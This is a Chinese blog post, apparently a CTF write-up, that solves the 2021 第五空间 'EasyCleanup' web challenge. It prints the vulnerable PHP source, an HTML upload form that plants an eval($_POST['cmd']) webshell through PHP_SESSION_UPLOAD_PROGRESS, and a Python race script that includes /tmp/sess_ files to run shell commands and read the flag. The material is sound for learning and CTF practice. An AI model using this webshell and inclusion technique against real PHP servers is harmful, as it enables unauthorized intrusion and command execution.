2021-第五空间智能安全大赛-Web-EasyCleanup

最新推荐文章于 2024-07-23 22:20:41 发布
最新推荐文章于 2024-07-23 22:20:41 发布
阅读量1.6k 收藏 4
点赞数 3
分类专栏: CTFWP 文章标签: php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53863234/article/details/121665714
版权

打开后看到源码:

<?php

if(!isset($_GET['mode'])){
    highlight_file(__file__);
}else if($_GET['mode'] == "eval"){
    $shell = $_GET['shell'] ?? 'phpinfo();';
    if(strlen($shell) > 15 | filter($shell) | checkNums($shell)) exit("hacker");
    eval($shell);
}


if(isset($_GET['file'])){
    if(strlen($_GET['file']) > 15 | filter($_GET['file'])) exit("hacker");
    include $_GET['file'];
}


function filter($var): bool{
    $banned = ["while", "for", "\$_", "include", "env", "require", "?", ":", "^", "+", "-", "%", "*", "`"];

    foreach($banned as $ban){
        if(strstr($var, $ban)) return True;
    }

    return False;
}

function checkNums($var): bool{
    $alphanum = 'abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ';
    $cnt = 0;
    for($i = 0; $i < strlen($alphanum); $i++){
        for($j = 0; $j < strlen($var); $j++){
            if($var[$j] == $alphanum[$i]){
                $cnt += 1;
                if($cnt > 8) return True;
            }
        }
    }
    return False;
}
?>

这道题很明显存在eval,可以导致rce,但是通过filter和checkNums这两个函数的过滤很难达到(几乎不可能)rce的目的,又把目光转向这个file,这里存在文件包含的漏洞,但在这里要包含哪个恶意文件呢?没有恶意文件?
很自然我们想到了利用PHP_SESSION_UPLOAD_PROGRESS进行文件包含。
查看phpinfo中的设置
在这里插入图片描述
这里的session.use_strict_mode=0,
在这里插入图片描述
session.upload_process.cleanup为off,不需要进行条件竞争。且没有session.save_path,默认就是/tmp/sess_xxxx.
利用上传文件的代码:

<!DOCTYPE html>
<html>
<head>
	<title>hakaiisu</title>
	<meta charset="utf-8">
</head>
<body>
	<form action="http://challenge-41a945986720d0e4.sandbox.ctfhub.com:10800/" method="POST" enctype="multipart/form-data"><!-- 	
不对字符编码-->
	    <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="<?php eval($_POST['cmd']); ?>" />
	    <input type="file" name="file" />
	    <input type="submit" value="go" />
	</form>
</body>
</html>

直接上传
注意添加Cookie的字段内容
在这里插入图片描述
蚁剑直接连接

http://challenge-41a945986720d0e4.sandbox.ctfhub.com:10800/?file=/tmp/sess_7t0

还有一种方法就是直接利用网上大佬的脚本:

# -*- coding: utf-8 -*-
import io
import requests
import threading

myurl = 'http://114.115.134.72:32770/index.php'
sessid = '7t0'
myfile = io.BytesIO(b'hakaiisu' * 1024)
writedata = {"PHP_SESSION_UPLOAD_PROGRESS": "<?php system('ls -lha /');?>"}
mycookie = {'PHPSESSID': sessid}

def writeshell(session):
    while True:
        resp = requests.post(url=myurl, data=writedata, files={'file': ('hakaiisu.txt', 123)}, cookies=mycookie)

def getshell(session):
    while True:
        payload_url = myurl + '?file=' + '/tmp/sess_' +sessid
        resp = requests.get(url=payload_url)
        if 'upload_progress' in resp.text:
            print(resp.text)
            break
        else:
            pass


if __name__ == '__main__':
    session = requests.session()
    writeshell = threading.Thread(target=writeshell, args=(session,))
    writeshell.daemon = True
    writeshell.start()
    getshell(session)

在这里插入图片描述
发现flag,直接修改第九行(最好把sessid也修改一下)

cat  /flag_is_here_not_are_but_you_find

也拿到flag
在这里插入图片描述

早川秋zcq
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
2021第五空间网络安全大赛
Huamang的博客
09-17 1207
WebFTP https://github.com/wifeat/WebFTP 根据github的源码,去对网站进行分析,有写到初始账号 但是题目改了密码,登不进 然后下载到题目的Config.php.bak,看到版本是v2.3 出现了git泄漏,无法下载到文件,但是看到了目录结构 找到探针 http://114.115.185.167:32770/Readme/mytz.php http://114.115.185.167:32770/Readme/mytz.php?act=phpinfo 直接找到f
NSS刷题记录web
a2303716126的博客
07-14 144
所以构造payload code=printf(`l\s /`);会发现一个目录ffffffff?审计代码,一顿乱分析,发现PHPinfo看到session临时文件上传。
[第五空间 2021]EasyCleanup
ph0ebus的博客
02-03 1208
从一道赛题学习利用session.upload_progress实现恶意文件包含getshell
CTFHUB-EasyCleanup
最新发布
2301_79858466的博客
07-23 543
但session还有一个默认选项,session.use_strict_mode默认值为 off。并产生一个键值,这个键值有ini.get(“session.upload_progress.prefix”)+由我们构造的 session.upload_progress.name 值组成,最后被写入 sess_ 文件里。session.upload_progress_enabled:当这个配置为 On 时,代表 session.upload_progress 功能开始,如果这个选项关闭,则这个方法用不了。
NSSCTF题解
网络安全爱好者,分享渗透测试、漏洞复现、src挖掘,靶场搭建知识和技巧
03-17 1140
首先看这个代码的逻辑,我们的可控点是content,同时可以写入文件进去,在unzip函数中extractTo可以解压/tmp的文件到$_SERVER['DOCUMENT_ROOT']."/static/upload/".md5($filename),然后经过一大堆过滤,最后就是unlink删除文件,所以我们可以进行条件竞争,在解压文件和删除文件进行竞争。就可以查询出flag。响应中的hash值随着name参数的变化而变化,但又不完全是md5加密的值,这里看提示后,直接构造payload。
CTFHUB历年真题练习
qq_51558360的博客
10-11 1390
WebsiteManger 考点 布尔盲注、SSRF 尝试了一般登录方法没有反应。查看源码发现sql注入的利用点在图片上 盲注脚本 import string from requests import * allstr = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\]^_`{|}~' myurl = 'http://challenge-1993b
EasyCleanup(session文件包含&条件竞争)
qq_52907838的博客
09-26 997
打开就是原码 <?php if(!isset($_GET['mode'])){ highlight_file(__file__); }else if($_GET['mode'] == "eval"){ $shell = $_GET['shell'] ?? 'phpinfo();'; if(strlen($shell) > 15 | filter($shell) | checkNums($shell)) exit("hacker"); eval($shell...
2021-01全国人工智能机器人大赛组织方案.pdf
11-25
"2021-01全国人工智能机器人大赛组织方案.pdf" 该文件是关于2021年全国人工智能机器人创新大赛的组织方案,旨在促进人工智能机器人的创新研发、科技转化、应用展示,激发创新意识、推动创新应用、培养创新人才,...
2021-2022收藏的精品资料2021-2022年餐饮店创业大赛计划书.doc
09-16
2021-2022收藏的精品资料
2021-2022年精品资料创新创业大赛总结报告.docx
10-02
2021-2022年的精品资料创新创业大赛是由经济管理学院主办,旨在响应国家对大学生创业的鼓励政策,帮助学生们打破传统就业模式,提升就业竞争力。 【大赛组织结构】 大赛分为赛前准备、初赛和决赛三个阶段。赛前...
2021-2022收藏的精品资料2021-2022年大学生创新创业大赛创业计划类模板概要.doc
09-16
2021-2022收藏的精品资料
2021-2022收藏的精品资料2021-2022年创业计划大赛策划书.doc
09-16
2021-2022年的湖南农业大学食品科学技术学院创业计划大赛以“创新成就梦想、创业成就未来”为主题,面向全校全日制本科生和研究生开放。大赛通过初赛、复赛、决赛三个阶段,选拔具有潜力的创业项目,为湖南省第六届...
session.upload_progress文件包含
Aiwin的博客
05-29 840
session.upload_progress文件包含
第五空间web复现
unexpectedthing的博客
09-27 753
@[]
刷题学习记录
qq_73861475的博客
12-20 1034
题目源码由源代码可知,当 mode=eval 时,若 shell 无值,则执行phpinfo();,若有值则经过滤后执行shell值的代码;file有值时经过滤后进行文件包含。所以攻击点有两个,一个是变量 shell 的 RCE ,一个是 file 的文件包含,由于 shell 变量需要经过filter($shell) | checkNums($shell),限制太多,想要通过 RCE 得到 flag 几乎无从下手,于是我们考虑从file寻找攻击点。
[第五空间 2021]web 复现wp
snowlyzz的博客
09-13 626
[第五空间 2021] wp
2021-第五空间智能安全大赛-Web-pklovecloud
qq_53863234的博客
11-29 3341
<?php include 'flag.php'; class pkshow { function echo_name() { return "Pk very safe^.^"; } } class acp { protected $cinder; public $neutron; public $nova; function __construct()
2021-第五空间智能安全大赛-PNG图片转换器 | 管道符与反引号的配合、open()函数绝杀
一醉一休的博客
09-23 1060
值得复盘的题目!
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值